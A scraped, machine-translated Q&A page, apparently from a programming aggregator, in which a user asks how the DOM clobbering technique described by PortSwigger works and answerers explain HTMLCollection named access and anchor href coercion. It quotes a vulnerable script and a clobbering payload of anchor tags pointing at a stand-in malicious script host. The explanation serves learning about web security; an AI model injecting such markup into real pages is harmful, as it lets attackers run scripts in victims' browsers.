Javascript DOM Clobbering及其工作原理_Javascript_Html_Dom_Frontend_Web Application Security - Fatal编程技术网

Warning: file_get_contents(/data/phpspider/zhask/data//catemap/3/html/82.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Javascript DOM Clobbering及其工作原理_Javascript_Html_Dom_Frontend_Web Application Security - Fatal编程技术网

Javascript DOM Clobbering及其工作原理

javascript html dom

Javascript DOM Clobbering及其工作原理,javascript,html,dom,frontend,web-application-security,Javascript,Html,Dom,Frontend,Web Application Security,我对以下主题有一些问题： Portswigger解释道： <script> window.onload = function(){ let someObject = window.someObject || {}; let script = document.createElement('script'); script.src = someObject.url; document.body.appendChild(script); }; <

我对以下主题有一些问题：

Portswigger解释道：

 <script>
 window.onload = function(){
    let someObject = window.someObject || {};
    let script = document.createElement('script');
    script.src = someObject.url;
    document.body.appendChild(script);
 };
</script>

锚元素是使用id引用的-一些浏览器将id直接存储在窗口对象（）中

然而：

为什么名称属性会用url覆盖url属性
DOM集合与所有这些有什么关系
```
window.someObject |{}
```
（）中的对象初始值设定项是否在攻击中起作用

这是控制台所说的：

（有关此主题的更多信息也可在此处找到：）

为什么名称属性会用url覆盖url属性

因为

someObject

实际上是一个HTMLCollection，您可以通过名称访问

HTMLCollection

中的命名元素

console.log（document.getElementsByClassName（“test”）.bar）
回到过去，我们会编写document.all.something
来获取带有name=“something”
的元素。这是在getElementById（）
之前。可以使用元素名作为键来访问DOM集合。另外，htmlanchoreElement.toString（）
返回已解析的href
值，该值在此向量中使用。最后一个问题：为什么script.src=someObject.url从整个锚元素中提取href？抱歉，发帖后马上就去了AFK。这是因为，别问，这段代码汇集了各个时代的规范所积累的最糟糕的恐怖，它很好地说明了为什么它是糟糕的。。。
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>

var someObject = window.someObject || {};




[html]相关文章推荐



                                                        
                                       





随机文章推荐



                                                        
Neural network 为什么我们在计算机中使用神经网络？
neural-network 
Neural network 神经网络教学：双极异或
neural-network 
Neural network 使用快速人工神经网络库时打印权重
neural-network 
Neural network 神经网络-从两种不同的i/p模式中寻找o/p
neural-network 
Neural network 以下神经网络之间的区别是什么：人工神经网络、静态神经网络、模拟神经网络
neural-network 
Neural network 创建用于评估逻辑函数的神经网络
neural-network 
Neural network 我在范恩做双精度错误吗？
neural-network 
Neural network 用函数链接神经网络求解奇偶3分类问题？
neural-network 
Neural network 为什么在ApacheMahout中不推荐使用MLP分类器？
neural-network 
Neural network 具有多个标签的Caffe图像数据层
neural-networkdeep-learning 
Neural network Tensorflow DNN回归大多忽略了分类列
neural-networktensorflowdeep-learning 
Neural network 使用relu进行梯度下降的影响
neural-networkdeep-learning 
Neural network 神经网络的训练与测试成绩实验
neural-networkkeras 
Neural network caffe丢失错误：检查失败：数据和标签应具有相同的第一维度
neural-networkdeep-learning 
Neural network 我应该使用float还是类作为神经网络最后一层的输出？
neural-networkdeep-learning 
Neural network nn.Linear（）在pytorch'；这是最后一次，为什么有必要？
neural-networkpytorch 
Neural network 神经网络中输入特征的重缩放
neural-network


                                        

                                        
                                        


                                                
                                                        [javascript]相关推荐
                                                        
Javascript <；选项>；标记，显示：无和jquery
									Javascript
							 									Jquery
							 
Javascript 从iframe显示弹出窗口，并使背景变暗，包括父页面
									Javascript
							 									Jquery
							 									Html
							 									Css
							 
使用参数从JavaScript调用Objective C方法
									Javascript
							 									Iphone
							 									Objective C
							 
Javascript Internet Explorer:将子项复制/克隆到阵列
									Javascript
							 									Jquery
							 									Internet Explorer
							 									Dom
							 
Javascript 滚动到长div中的元素
									Javascript
							 									Jquery
							 
Javascript jQuery水印堆栈溢出是什么样的？
									Javascript
							 
在服务器上处理Javascript
									Javascript
							 
保存完整的网站-Internet Explorer和javascript生成的代码
									Javascript
							 									Html
							 									Internet Explorer
							 
Javascript jquery便笺插件
									Javascript
							 									Jquery
							 									Json
							 									Jquery Plugins
							 
Javascript 在运行时更改对象属性名称
									Javascript
							 
Javascript 选中复选框时更改tr颜色
									Javascript
							 									Knockout.js
							 
Javascript innerHTML插入需要单击两次才能查看
									Javascript
							 
Javascript 拉斐尔Js can'；用图像填充路径
									Javascript
							 									Svg
							 
Javascript JS翻滚退出时在Chrome中调整翻滚大小
									Javascript
							 									Html
							 
Javascript 在敲除中添加jqueryui可排序的bindinghandler
									Javascript
							 									Knockout.js
							 
Javascript 试图减少图像上的延迟。预加载或
									Javascript
							 									Html
							 									Css
							 
Javascript 还可以共享全局事件的唯一主干事件总线
									Javascript
							 									Backbone.js
							 
Javascript 使用CoffeeScript将erb中的字段添加到表单
									Javascript
							 									Jquery
							 									Ruby On Rails
							 									Coffeescript
							 
Javascript 生成内容，PHP风格
									Javascript
							 									Php
							 									Jquery
							 									Html
							 									Dynamic
							 
Javascript 继续中止的AJAX（jqXHR）请求
									Javascript
							 									Jquery
							 									Ajax
							 
Javascript 循环迭代数组以查看动态创建的div'；s id在那里，不是吗'；我不能正常工作
									Javascript
							 									Html
							 									For Loop
							 									Dynamic
							 
Javascript rxjs中是否有在一天中的特定时间调用函数的默认方法？
									Javascript
							 									Rxjs
							 
将ckeditor值存储在javascript变量中
									Javascript
							 									Html
							 
Javascript addEventListener调用该函数时，我甚至没有要求它这样做
									Javascript
							 
Javascript将WEBTT文件转换为json
									Javascript
							 									Json
							 									Object
							 
Javascript 角度材质垫表将标题动态拆分为组
									Javascript
							 									Json
							 									Angular
							 									Typescript
							 									Angular Material
							 
Javascript 为什么赢了'；我的react本机应用程序是否从自己的react本机静态服务器获取？
									Javascript
							 									React Native
							 									Http
							 									Server
							 
Javascript 为什么CKEditor 5中的Base64上载适配器不能正确转换图像？
									Javascript
							 									Angular
							 
Javascript 如何创建一个匿名DM Discord bot，该bot将只发布指定频道中的图像或图像和文件，然后确认它已收到
									Javascript
							 									Node.js
							 									Discord
							 									Discord.js
							 
Javascript electron项目中应如何请求我的其他.js文件？/等待/异步块中的令牌错误
									Javascript
							 									Node.js
							 									Electron
							 
                                                        
                                                

                                                
                                                        Tags
                                                        
Types
Haskell
Exchange Server
Linker
Marklogic
Variables
Speech Recognition
Gnuplot
Scripting
Xaml
Apache Flink
Tensorflow
Gradle
Magento2
Gtk
Apache Kafka
Reflection
Amazon S3
Oracle10g
Cygwin
Rspec
Laravel
Testing
Hadoop
C#
Azure Sql Database
Terminal
Jsf
File
Entity Framework
Download
Pyspark
Sql
Ms Access
Wicket
Inheritance
Artifactory
Xcode4
Mpi
Design Patterns
Polymer
Mapbox
Webstorm
Rabbitmq
Keycloak
Nginx
Login
Xamarin
Function
Microservices
Neural Network
Rest
Nlp
Monitoring
Azure Data Factory
Ssh
Dns
Sqlite
Sql Server
Dynamics Crm
Cassandra
Blazor
Log4j
Bazel
Corda
Asp.net Mvc 5
Cors
Telerik
Xquery
Ibm Cloud
Symfony1
Activemq
Applescript
Sms
Svg
Svn
Vbscript
Amazon Redshift
Kdb
Gstreamer
Database Design
Transactions
Process
Vagrant
Permissions
Socket.io
Certificate
Datatables
Gwt
Csv
Express
Octave
Loops
Cuda
Perl
Codeigniter
Apache2
Netty
Netbeans
React Native
Binding
Actionscript
Autodesk Forge
Arangodb
Assembly
Requirejs
Com
Security
Iphone
Sphinx
Dictionary
Odata
Codenameone
Emacs
Dojo
Salesforce
Centos
Rss
Content Management System
Gridview
Date
Sparql
Dll
Filesystems
Couchdb
Reactjs
Yocto
Twig
Statistics
Ios4
Web Services
Cron
Mapping
Computer Science
Cocoa
Hibernate
Windows 10
Cluster Computing
Https
Graph
Swift2
Nsis
Appium
Unit Testing
Terraform
Visual Studio 2008
Lambda
Debugging
Electron
Streaming
Flutter
Binary
Azure Ad B2c
Vaadin
Solr
Data Binding
Loopbackjs
Memory Leaks
Url
Concurrency
Ruby On Rails 4
Mono
Google Drive Api
Sas
Pointers
Encoding
Zurb Foundation
Dotnetnuke
Frameworks
Asp.net Core Mvc
Flask
Spring Batch
Kernel
Cypress
Google Chrome Devtools
Asp.net
Cocoa Touch
Ant
Razor
Logic
Search
D3.js
Hive
Doxygen
Asp.net Web Api
Kendo Ui
Windows Mobile
Less
Teradata
Documentation
Localization
Dom
Vb6
Parameters
Azure Devops
Migration
Grails
Vue.js
Kotlin
Css
Qml


                

                        
						
                        
                                
                                        
                                                
                                                        
                                                                Copyright © 2024. All Rights Reserved by  - Fatal编程技术网